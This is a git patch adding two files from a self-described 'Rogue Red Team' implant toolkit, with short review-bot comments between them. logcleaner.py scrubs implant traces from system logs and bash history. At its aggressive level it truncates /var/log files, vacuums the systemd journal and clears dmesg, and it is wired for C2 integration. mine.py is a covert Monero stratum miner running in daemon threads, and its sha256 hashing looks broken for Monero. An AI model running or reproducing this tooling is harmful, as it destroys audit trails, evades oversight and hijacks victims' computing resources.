From 6e818cd0768a7850f98f22edec87be8bcaa6f32e Mon Sep 17 00:00:00 2001
From: ek0ms savi0r
Date: Sun, 31 May 2026 04:12:47 +0000
Subject: [PATCH] Upload files to "/"
---
logcleaner.py | 295 ++++++++++++++++++++++++++++++++++++++++++++++++++
mine.py | 96 ++++++++++++++++
2 files changed, 391 insertions(+)
create mode 100644 logcleaner.py
create mode 100644 mine.py
diff --git a/logcleaner.py b/logcleaner.py
new file mode 100644
index 0000000..10c5e2b
--- /dev/null
+++ b/logcleaner.py
@@ -0,0 +1,295 @@
+#!/usr/bin/env python3
+"""
+PAYLOAD: Log Cleaner
+DESCRIPTION: Removes forensic traces from system logs
+AUTHOR: Rogue Red Team
+VERSION: 2.0
+SECURITY: This tool modifies system logs - Use only on authorized systems
+"""
+import os, sys, re, subprocess, datetime, json, hashlib
+
+class LogCleaner:
+ def __init__(self, implant_id=None):
+ self.implant_id = implant_id or self.get_implant_id()
+ self.log_patterns = [
+ r'rogue_implant',
+ r'rogue_agent',
+ r'systemd-journald.*python',
+ r'python3.*\.cache/\.rogue',
+ r'polyloader',
+ r'ddos\.py',
+ r'mine\.py',
+ r'keylogger',
+ r'screenshot',
+ self.implant_id
+ ]
+
+ # System log files to clean
+ self.log_files = {
+ 'linux': [
+ '/var/log/auth.log',
+ '/var/log/syslog',
+ '/var/log/messages',
+ '/var/log/secure',
+ '/var/log/kern.log',
+ '/var/log/dmesg',
+ '/var/log/boot.log',
+ '/var/log/cron',
+ '/var/log/maillog',
+ '/var/log/spooler',
+ '/var/log/lastlog',
+ '/var/log/wtmp',
+ '/var/log/btmp',
+ '/var/log/utmp',
+ '/var/log/faillog'
+ ],
+ 'bash_history': [
+ os.path.expanduser('~/.bash_history'),
+ '/root/.bash_history'
+ ],
+ 'application_logs': [
+ os.path.expanduser('~/.cache/.rogue/.implant.log')
+ ]
+ }
+
+ def get_implant_id(self):
+ """Generate implant identifier for pattern matching"""
+ import socket, getpass
+ hostname = socket.gethostname()
+ username = getpass.getuser()
+ return hashlib.md5(f"{hostname}_{username}".encode()).hexdigest()[:8]
+
+ def clean_file(self, filepath):
+ """Remove matching lines from a file"""
+ if not os.path.exists(filepath):
+ return {"file": filepath, "status": "not_found"}
+
+ try:
+ with open(filepath, 'r') as f:
+ lines = f.readlines()
+
+ original_count = len(lines)
+
+ # Filter out lines matching any pattern
+ new_lines = []
+ for line in lines:
+ if not any(re.search(pattern, line, re.IGNORECASE) for pattern in self.log_patterns):
+ new_lines.append(line)
+
+ removed_count = original_count - len(new_lines)
+
+ if removed_count > 0:
+ # Backup original file
+ backup_path = f"{filepath}.rogue_backup"
+ if not os.path.exists(backup_path):
+ with open(backup_path, 'w') as f:
+ f.writelines(lines)
+
+ # Write cleaned file
+ with open(filepath, 'w') as f:
+ f.writelines(new_lines)
+
+ return {
+ "file": filepath,
+ "status": "cleaned",
+ "removed": removed_count,
+ "backup": backup_path
+ }
+ else:
+ return {
+ "file": filepath,
+ "status": "no_matches",
+ "removed": 0
+ }
+
+ except Exception as e:
+ return {
+ "file": filepath,
+ "status": "error",
+ "error": str(e)
+ }
+
+ def clean_bash_history(self):
+ """Clean bash history files"""
+ results = []
+
+ for history_file in self.log_files['bash_history']:
+ if os.path.exists(history_file):
+ result = self.clean_file(history_file)
+ results.append(result)
+
+ # Also clear current session history
+ if history_file == os.path.expanduser('~/.bash_history'):
+ subprocess.call('history -c', shell=True)
+ subprocess.call('history -w', shell=True)
+
+ return results
+
+ def clean_system_logs(self):
+ """Clean system log files"""
+ results = []
+
+ for log_file in self.log_files['linux']:
+ result = self.clean_file(log_file)
+ results.append(result)
+
+ return results
+
+ def clean_application_logs(self):
+ """Clean application-specific logs"""
+ results = []
+
+ for log_file in self.log_files['application_logs']:
+ result = self.clean_file(log_file)
+ results.append(result)
+
+ return results
+
+ def clear_memory_logs(self):
+ """Clear log-related memory"""
+ results = []
+
+ try:
+ # Clear systemd journal
+ if os.path.exists('/bin/journalctl'):
+ subprocess.call('journalctl --vacuum-time=1s 2>/dev/null', shell=True)
+ subprocess.call('journalctl --rotate 2>/dev/null', shell=True)
+ results.append({
+ "action": "systemd_journal_clear",
+ "status": "success"
+ })
+
+ # Clear dmesg
+ subprocess.call('dmesg -c 2>/dev/null', shell=True)
+ results.append({
+ "action": "dmesg_clear",
+ "status": "success"
+ })
+
+ except Exception as e:
+ results.append({
+ "action": "memory_logs_clear",
+ "status": "error",
+ "error": str(e)
+ })
+
+ return results
+
+ def execute(self, clean_level="aggressive"):
+ """Execute log cleaning based on level"""
+ results = {
+ "timestamp": datetime.datetime.now().isoformat(),
+ "clean_level": clean_level,
+ "operations": []
+ }
+
+ try:
+ print("[+] Starting log cleaning operations...")
+
+ # Always clean application logs
+ print("[+] Cleaning application logs...")
+ app_results = self.clean_application_logs()
+ results["operations"].extend(app_results)
+
+ # Clean bash history
+ print("[+] Cleaning bash history...")
+ bash_results = self.clean_bash_history()
+ results["operations"].extend(bash_results)
+
+ if clean_level in ["moderate", "aggressive"]:
+ print("[+] Cleaning system logs...")
+ sys_results = self.clean_system_logs()
+ results["operations"].extend(sys_results)
+
+ if clean_level == "aggressive":
+ print("[+] Clearing memory logs...")
+ mem_results = self.clear_memory_logs()
+ results["operations"].extend(mem_results)
+
+ # Additional aggressive measures
+ print("[+] Performing aggressive cleanup...")
+ aggressive_results = self.aggressive_cleanup()
+ results["operations"].extend(aggressive_results)
+
+ # Generate summary
+ total_cleaned = sum(op.get("removed", 0) for op in results["operations"] if isinstance(op, dict))
+ total_errors = sum(1 for op in results["operations"] if isinstance(op, dict) and op.get("status") == "error")
+
+ results["summary"] = {
+ "total_operations": len(results["operations"]),
+ "total_lines_removed": total_cleaned,
+ "total_errors": total_errors
+ }
+
+ print(f"[+] Log cleaning complete. Removed {total_cleaned} lines across {len(results['operations'])} files.")
+
+ # Save results
+ output_dir = os.path.expanduser("~/.cache/.rogue/cleanup")
+ os.makedirs(output_dir, exist_ok=True)
+
+ output_file = os.path.join(output_dir, f"logclean_{datetime.datetime.now().strftime('%Y%m%d_%H%M%S')}.json")
+ with open(output_file, 'w') as f:
+ json.dump(results, f, indent=2, default=str)
+
+ return json.dumps(results["summary"], indent=2)
+
+ except Exception as e:
+ return f"[!] Log cleaning failed: {str(e)}"
+
+ def aggressive_cleanup(self):
+ """Additional aggressive cleanup measures"""
+ results = []
+
+ try:
+ # Overwrite log files with null data
+ for log_file in self.log_files['linux']:
+ if os.path.exists(log_file):
+ try:
+ # Truncate file
+ open(log_file, 'w').close()
+ results.append({
+ "file": log_file,
+ "action": "truncated",
+ "status": "success"
+ })
+ except:
+ pass
+
+ # Remove backup files
+ import glob
+ backup_files = glob.glob("/var/log/*.rogue_backup") + glob.glob("~/.cache/.rogue/*.backup")
+ for backup in backup_files:
+ try:
+ os.remove(backup)
+ results.append({
+ "file": backup,
+ "action": "backup_removed",
+ "status": "success"
+ })
+ except:
+ pass
+
+ except Exception as e:
+ results.append({
+ "action": "aggressive_cleanup",
+ "status": "error",
+ "error": str(e)
+ })
+
+ return results
+
+def rogue_integration():
+ """Wrapper for Rogue C2 integration"""
+ import argparse
+
+ parser = argparse.ArgumentParser(description='Rogue Log Cleaner')
+ parser.add_argument('--level', choices=['light', 'moderate', 'aggressive'],
+ default='moderate', help='Cleaning intensity level')
+
+ args, unknown = parser.parse_known_args()
+
+ cleaner = LogCleaner()
+ return cleaner.execute(clean_level=args.level)
+
+if __name__ == "__main__":
+ print(rogue_integration())
diff --git a/mine.py b/mine.py
new file mode 100644
index 0000000..32c035b
--- /dev/null
+++ b/mine.py
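Review bot: In logcleaner.py the docstring and comments on `aggressive_cleanup` understate what it does: the loop under `# Overwrite log files with null data` opens each path in `log_files['linux']` with mode `'w'`, which truncates the file rather than overwriting it, and the following block removes the `/var/log/*.rogue_backup` copies written by `clean_file`, so at the `aggressive` level the host's local audit trail is gone with no way back. Nothing in the code enforces the header's "authorized systems" line, so the docstring should at least state the effect plainly, e.g. `"""Truncate every file in log_files['linux'] and delete the /var/log/*.rogue_backup copies; irreversible."""`. Read as detection material, the hard-coded names are the indicators: `.rogue_backup` files beside logs, `~/.cache/.rogue/cleanup/logclean_*.json` reports, and `journalctl --vacuum-time=1s` or `dmesg -c` spawned from Python. Every path the class touches is local, so log entries already forwarded to another host are not affected by it.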
@@ -0,0 +1,96 @@
+#!/usr/bin/env python3
+import threading, socket, json, time, os, base64
+import hashlib, random
+
+WALLET = "YOUR_MONERO_WALLET_ADDRESS"
+POOL = "pool.supportxmr.com"
+PORT = 3333
+THREADS = 2
+THROTTLE = 0.1 # Delay per hash, lower = more aggressive
+
+def get_job(sock):
+ while True:
+ try:
+ data = sock.recv(4096).decode()
+ for line in data.strip().split("\n"):
+ if "job" in line:
+ return json.loads(line)
+ except Exception as e:
+ print(f"[!] Error receiving job: {e}")
+ time.sleep(5)
+
+def submit_share(sock, job_id, nonce, result):
+ sub = {
+ "id": "0",
+ "method": "submit",
+ "params": {
+ "id": "worker",
+ "job_id": job_id,
+ "nonce": nonce,
+ "result": result
+ }
+ }
+ try:
+ sock.send((json.dumps(sub) + "\n").encode())
+ except:
+ pass # Ignore broken pipe or timeout
+
+def connect_stratum():
+ s = socket.socket()
+ s.connect((POOL, PORT))
+ login = {
+ "id": "0",
+ "method": "login",
+ "params": {
+ "login": WALLET,
+ "pass": "x",
+ "agent": "RogueMiner/1.0"
+ }
+ }
+ s.send((json.dumps(login) + "\n").encode())
+ return s
+
+def mine_loop():
+ while True:
+ try:
+ sock = connect_stratum()
+ job_data = get_job(sock)
+ job = job_data['result']['job']
+ blob = job['blob']
+ job_id = job['job_id']
+ target = int(job['target'], 16)
+
+ print(f"[+] New job received. Starting mining thread.")
+ hashes = 0
+
+ while True:
+ nonce = format(random.randint(0, 99999999), '08x')
+ base = blob[:78] + nonce + blob[86:]
+ hash_result = hashlib.sha256(bytes.fromhex(base)).hexdigest()
+ hashes += 1
+
+ if int(hash_result, 16) < target:
+ print(f"[✓] Share accepted: {hash_result[:16]}")
+ submit_share(sock, job_id, nonce, hash_result)
+ break # get new job after submission
+
+ time.sleep(THROTTLE)
+
+ except Exception as e:
+ print(f"[!] Miner thread error: {e}")
+ time.sleep(10) # reconnect delay
+
+if __name__ == "__main__":
+ print("👑 RogueMiner: Continuous Mining Enabled")
+ threads = []
+ for i in range(THREADS):
+ t = threading.Thread(target=mine_loop)
+ t.daemon = True
+ t.start()
+ threads.append(t)
+
+ try:
+ while True:
+ time.sleep(5)
+ except KeyboardInterrupt:
+ print("\n[!] Mining interrupted by user.")
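Review bot: mine.py has no module docstring, unlike logcleaner.py, so nothing at the top of the file says what it contacts or consumes. `connect_stratum` opens a TCP connection to `POOL:PORT` and sends a JSON `login` carrying `WALLET` and the agent string `RogueMiner/1.0`, and the `__main__` block starts `THREADS` daemon threads running `mine_loop` indefinitely. A header such as `"""Stratum client: connects to POOL:PORT and hashes in THREADS background threads until interrupted."""` would make that network and CPU footprint explicit. The imports `os` and `base64` and the `hashes` counter are never read in this file. For monitoring, the pool hostname, port 3333 and the agent string in the login message are usable as network indicators.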